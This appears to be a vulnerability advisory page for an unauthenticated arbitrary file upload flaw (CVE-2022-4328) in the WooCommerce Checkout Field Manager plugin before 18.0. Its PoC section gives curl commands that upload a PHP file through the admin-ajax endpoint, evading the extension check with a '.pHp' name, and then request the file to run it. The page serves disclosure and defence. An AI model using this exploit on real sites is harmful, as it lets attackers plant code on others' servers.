Lucene search
CydaveWPVDB-ID:4DC72CD2-81D7-4A66-86BD-C9CFAF690EEDHistoryFeb 13, 2023 - 12:00 a.m.
WooCommerce Checkout Field Manager < 18.0 - Unauthenticated Arbitrary File Upload
2023-02-1300:00:00
cydave
wpscan.com
31
woocommerce
checkout field manager
unauthenticated
arbitrary file upload
vulnerable plugin
0.202 Low
EPSS
Percentile
96.4%
The plugin does not validate files to be uploaded, which could allow unauthenticated attackers to upload arbitrary files such as PHP on the server
PoC
1. Install and activate woocommerce (dependency, no setup required) 2. Install and active the vulnerable plugin (n-media-woocommerce-checkout-fields 17.2) 3. Prepare the payload: echo ‘’ > /tmp/payload.php 4. Invoke the following curl command to upload the payload (notice the name parameter is set to “.pHp”): curl -i ‘http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=cfom_upload_file&name;=payload.pHp’ \ -F ‘file=@/tmp/payload.php’ 5. Trigger the payload: curl -i ‘http://127.0.0.1:7777/wp-content/uploads/cfom_files/payload.php’
| CPE | Name | Operator | Version |
|---|---|---|---|
| n-media-woocommerce-checkout-fields | lt | 18.0 |
Related
wpexploit
wpexploit
nuclei
nuclei
WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload
2023-05-06 12:12:20
cvelist
cvelist
prion
prion
Code injection
2023-03-06 14:15:00
nvd
nvd
CVE-2022-4328
2023-03-06 14:15:09
cve
cve
CVE-2022-4328
2023-03-06 14:15:09
wordfence
wordfence